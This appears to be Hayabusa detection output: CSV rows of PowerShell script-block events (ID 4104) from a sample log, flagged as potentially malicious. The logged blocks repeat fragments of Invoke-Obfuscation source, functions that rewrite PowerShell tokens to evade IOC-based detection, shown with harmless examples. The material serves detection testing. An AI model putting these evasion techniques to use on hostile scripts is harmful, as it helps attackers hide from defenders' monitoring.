{[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 1 C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # If we are dealing with a Type that is found in $TypesThatCannotByDirectTypeCasted then return as is since it will error if we try to direct Type cast. ForEach($Type in $TypesThatCannotByDirectTypeCasted) { If($Token.Content.ToLower().Contains($Type)) { Return $ScriptString } } # If we are dealing with a Type that is NOT immediately followed by a Member token (denoted by . or :: operators) then we won't obfuscated. # This is for Type tokens like: [Char][Int]'123' etc. If(($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,1) -ne '.') -AND ($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,2) -ne '::')) { Return $ScriptString } # This variable will be used to track the growth in length of $ScriptString since we'll be appending variable creation at the beginning of $ScriptString. # This will allow us to avoid tokenizing $ScriptString for every single Type token that is present. $PrevLength = $ScriptString.Length # See if we've already set another instance of this same Type token previously in this obfsucation iteration. $RandomVarName = $NULL $UsingPreviouslyDefinedVarName = $FALSE ForEach($DefinedTokenVariable in $Script:TypeTokenVariableArray) { If($Token.Content.ToLower() -eq $DefinedTokenVariable[0]) { $RandomVarName = $DefinedTokenVariable[1] $UsingPreviouslyDefinedVarName = $TRUE } } # If we haven't already defined a random variable for this Token type then we will do that. Otherwise we will use the previously-defined variable. If(!($UsingPreviouslyDefinedVarName)) { # User input $ObfuscationLevel (1-2) will choose between concatenating Type token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce another Type token unnecessarily ([Regex]). # Trim of encapsulating square brackets before obfuscating the string value of the Type token. $TokenContent = $Token.Content.Trim('[]') Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Type Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Add syntax for direct type casting. $ObfuscatedTokenTypeCast = '[type]' + '(' + $ObfuscatedToken + ')' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Track this variable name and Type token so we can reuse this variable name for future uses of this same Type token in this obfuscation iteration. $Script:TypeTokenVariableArray += , @($Token.Content,$RandomVarName) } # Randomly decide if the variable name will be concatenated inline or not. # Handle both <varname> and <variable:varname> syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' $RandomVarSetSyntax += 'Set-Item' + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. $RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # If we're using an existing variable already set in ScriptString for the current Type token then we don't need to prepend an additional SET variable syntax. $PortionToPrependToScriptString = '' If(!($UsingPreviouslyDefinedVarName)) { $PortionToPrependToScriptString = ' '*(Get-Random @(0..2)) + $RandomVarSet + ' '*(Get-Random @(0..2)) + ';' + ' '*(Get-Random @(0..2)) } # Add the obfuscated token back to $ScriptString. $ScriptString = $PortionToPrependToScriptString + $ScriptString.SubString(0,$Token.Start+$Script:TypeTokenScriptStringGrowth) + ' '*(Get-Random @(1..2)) + $RandomVarGet + $ScriptString.SubString($Token.Start+$Token.Length+$Script:TypeTokenScriptStringGrowth) # Keep track how much $ScriptString grows for each Type token obfuscation iteration. $Script:TypeTokenScriptStringGrowth = $Script:TypeTokenScriptStringGrowth + $PortionToPrependToScriptString.Length Return $ScriptString } Function Out-ObfuscatedVariableTokenLevel1 { <# .SYNOPSIS Obfuscates variable token by randomizing its case, randomly adding ticks and wrapping it in curly braces. Invoke-Obfuscation Function: Out-ObfuscatedVariableTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedVariableTokenLevel1 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Variable'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} C:\PS> $ScriptString ${m`e`ssAge1} = 'Hello World!'; Write-Host ${MEss`Ag`e1} -ForegroundColor Green; ${meSsAg`e`2} = 'Obfuscation Rocks!'; Write-Host ${M`es`SagE2} -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green} 'Variable' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Return as-is if the variable is already encapsulated with ${}. Otherwise you will get errors if you have something like ${var} turned into ${${var}} If($ScriptString.SubString($Token.Start,2) -eq '${') { Return $ScriptString } # Length of pre-obfuscated ScriptString will be important in extracting out the obfuscated token before we add curly braces. $PrevLength = $ScriptString.Length $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token # Pull out ObfuscatedToken from ScriptString and add curly braces around obfuscated variable token. $ObfuscatedToken = $ScriptString.SubString($Token.Start,$Token.Length+($ScriptString.Length-$PrevLength)) $ObfuscatedToken = '${' + $ObfuscatedToken.Trim('""') + '}' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length+($ScriptString.Length-$PrevLength)) Return $ScriptString } Function Out-RandomCaseToken { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and reinserting it into the ScriptString input variable. Invoke-Obfuscation Function: Out-RandomCaseToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCaseToken obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RandomCaseToken $ScriptString $Token} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor GREeN; Write-Host 'Obfuscatio",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"el value ($ObfuscationLevel) was passed to switch block for Argument Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedTypeToken { <# .SYNOPSIS Obfuscates type token by using direct type cast syntax and concatenating or reordering the Type token value. This function only applies to Type tokens immediately followed by . or :: operators and then a Member token. E.g. [Char][Int]'123' will not be obfuscated by this function, but [Console]::WriteLine will be obfuscated. Invoke-Obfuscation Function: Out-ObfuscatedTypeToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTypeToken obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Type token value. .EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} C:\PS> $ScriptString sET EOU ( [TYPe]('CO'+'NS'+'oLe')) ; ( CHILdiTEM VariablE:EOU ).VALUE::WriteLine('Hello World!'); $eoU::WriteLine('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} C:\PS> $ScriptString SET-vAriablE BVgz6n ([tYpe](""{2}{1}{0}"" -f'sOle','On','C') ) ; $BVGz6N::WriteLine('Hello World!'); ( cHilDItem vAriAbLE:bVGZ6n ).VAlue::WriteLine('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 1 C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # If we are dealing with a Type that is found in $TypesThatCannotByDirectTypeCasted then return as is since it will error if we try to direct Type cast. ForEach($Type in $TypesThatCannotByDirectTypeCasted) { If($Token.Content.ToLower().Contains($Type)) { Return $ScriptString } } # If we are dealing with a Type that is NOT immediately followed by a Member token (denoted by . or :: operators) then we won't obfuscated. # This is for Type tokens like: [Char][Int]'123' etc. If(($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,1) -ne '.') -AND ($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,2) -ne '::')) { Return $ScriptString } # This variable will be used to track the growth in length of $ScriptString since we'll be appending variable creation at the beginning of $ScriptString. # This will allow us to avoid tokenizing $ScriptString for every single Type token that is present. $PrevLength = $ScriptString.Length # See if we've already set another instance of this same Type token previously in this obfsucation iteration. $RandomVarName = $NULL $UsingPreviouslyDefinedVarName = $FALSE ForEach($DefinedTokenVariable in $Script:TypeTokenVariableArray) { If($Token.Content.ToLower() -eq $DefinedTokenVariable[0]) { $RandomVarName = $DefinedTokenVariable[1] $UsingPreviouslyDefinedVarName = $TRUE } } # If we haven't already defined a random variable for this Token type then we will do that. Otherwise we will use the previously-defined variable. If(!($UsingPreviouslyDefinedVarName)) { # User input $ObfuscationLevel (1-2) will choose between concatenating Type token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce another Type token unnecessarily ([Regex]). # Trim of encapsulating square brackets before obfuscating the string value of the Type token. $TokenContent = $Token.Content.Trim('[]') Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Type Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Add syntax for direct type casting. $ObfuscatedTokenTypeCast = '[type]' + '(' + $ObfuscatedToken + ')' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Track this variable name and Type token so we can reuse this variable name for future uses of this same Type token in this obfuscation iteration. $Script:TypeTokenVariableArray += , @($Token.Content,$RandomVarName) } # Randomly decide if the variable name will be concatenated inline or not. # Handle both <varname> and <variable:varname> syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' $RandomVarSetSyntax += 'Set-Item' + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. $RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # If we're using an existing variable already set in ScriptString for the current Type token then we don't need to prepend an additional SET variable syntax. $PortionToPrependToScriptString = '' If(!($UsingPreviouslyDefinedVarName)) { $PortionToPrependToScriptString = ' '*(Get-Random @(0..2)) + $RandomVarSet + ' '*(Get-Random @(0..2)) + ';' + ' '*(Get-Random @(0..2)) } # Add the obfuscated token back to $ScriptString. $ScriptString = $PortionToPrependToScriptString + $ScriptString.SubString(0,$Token.Start+$Script:TypeTokenScriptStringGrowth) + ' '*(Get-Random @(1..2)) + $RandomVarGet + $ScriptString.SubString($Token.Start+$Token.Length+$Script:TypeTokenScriptStringGrowth) # Keep track how much $ScriptString grows for each Type token obfuscation iteration. $Script:TypeTokenScriptStringGrowth = $Script:TypeTokenScriptStringGrowth + $PortionToPrependToScriptString.Length Return $ScriptString } Function Out-ObfuscatedVariableTokenLevel1 { <# .SYNOPSIS Obfuscates variable token by randomizing its case, randomly adding ticks and wrapping it in curly braces. Invoke-Obfuscation Function: Out-ObfuscatedVariableTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedVariableTokenLevel1 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Variable'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} C:\PS> $ScriptString ${m`e`ssAge1} = 'Hello World!'; Write-Host ${MEss`Ag`e1} -ForegroundColor Green; ${meSsAg`e`2} = 'Obfuscation Rocks!'; Write-Host ${M`es`SagE2} -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green} 'Variable' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Return as-is if the variable is already encapsulated with ${}. Otherwise you will get errors if you have something like ${var} turned into ${${var}} If($ScriptString.SubString($Token.Start,2) -eq '${') { Return $ScriptString } # Length of pre-obfuscated ScriptString will be important in extracting out the obfuscated token before we add curly braces. $PrevLength = $ScriptString.Length $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token # Pull out ObfuscatedToken from ScriptString and add curly braces around obfuscated variable token. $ObfuscatedToken = $ScriptString.SubString($Token.Start,$Token.Length+($ScriptString.Length-$PrevLength)) $ObfuscatedToken = '${' + $ObfuscatedToken.Trim('""') + '}' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length+($ScriptString.Length-$PrevLength)) Return $ScriptString } Function Out-RandomCaseToken { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and reinserting it into the ScriptString input variable. Invoke-Obfuscation Function: Out-RandomCaseToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCaseToken obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RandomCaseToken $ScriptString $Token} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor GREeN; Write-Host 'Obfuscatio",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"n Rocks!' -ForegroundColor gReeN .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # Convert character array back to string. $ObfuscatedToken = $TokenArray -Join '' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ConcatenatedString { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string by randomly concatenating it and encapsulating the result with input single- or double-quotes. Invoke-Obfuscation Function: Out-ConcatenatedString Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ConcatenatedString obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputVal Specifies the string to obfuscate. .PARAMETER Quote Specifies the single- or double-quote used to encapsulate the concatenated string. .EXAMPLE C:\PS> Out-ConcatenatedString ""String to be concatenated"" '""' ""String ""+""to be ""+""co""+""n""+""c""+""aten""+""at""+""ed .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] 